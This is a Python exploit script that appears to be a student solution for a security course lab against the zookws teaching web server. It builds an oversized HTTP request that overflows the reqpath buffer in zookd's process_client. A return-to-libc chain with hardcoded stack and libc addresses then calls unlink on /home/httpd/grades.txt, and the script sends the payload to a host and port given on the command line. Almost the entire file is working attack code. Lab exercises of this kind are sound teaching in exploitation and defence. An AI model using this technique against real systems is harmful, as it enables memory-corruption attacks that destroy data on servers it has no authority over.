exploit-4a.py

#!/usr/bin/python
"""
Exploiting the buffer reqpath at zookd.c/process_client:65 with a return-to-libc
attack.
"""
import sys
import socket
import traceback
import urllib
import struct

####

## You might find it useful to define variables that store various
## stack or function addresses from the zookd / zookfs processes,
## which you can then use in build_exploit(); the following are just
## examples.
reqpath_buffer_addr = 0xbfffee08
unlink_call_addr = 0x40102450 # found in gdb via 'info address unlink'


## This is the function that you should modify to construct an
## HTTP request that will cause a buffer overflow in some part
## of the zookws web server and exploit it.

def build_exploit():
    req = 'GET /' + \
      (2048 + 20 - 1) * 'X' + \
      struct.pack('<I', unlink_call_addr) + \
      'YOLO' + \
      struct.pack('<I', reqpath_buffer_addr + 2048 + 20 + 4 + 4 + 4) + \
      '/home/httpd/grades.txt' + \
      ' HTTP/1.0\r\n' + \
	    '\r\n'
    return req

####

def send_req(host, port, req):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("Connecting to %s:%d..." % (host, port))
    sock.connect((host, port))

    print("Connected, sending request...")
    sock.send(req)

    print("Request sent, waiting for reply...")
    rbuf = sock.recv(1024)
    resp = ""
    while len(rbuf):
	resp = resp + rbuf
	rbuf = sock.recv(1024)

    print("Received reply.")
    sock.close()
    return resp

####

if len(sys.argv) != 3:
    print("Usage: " + sys.argv[0] + " host port")
    exit()

req = build_exploit()
print("HTTP request:")
print(req)

resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)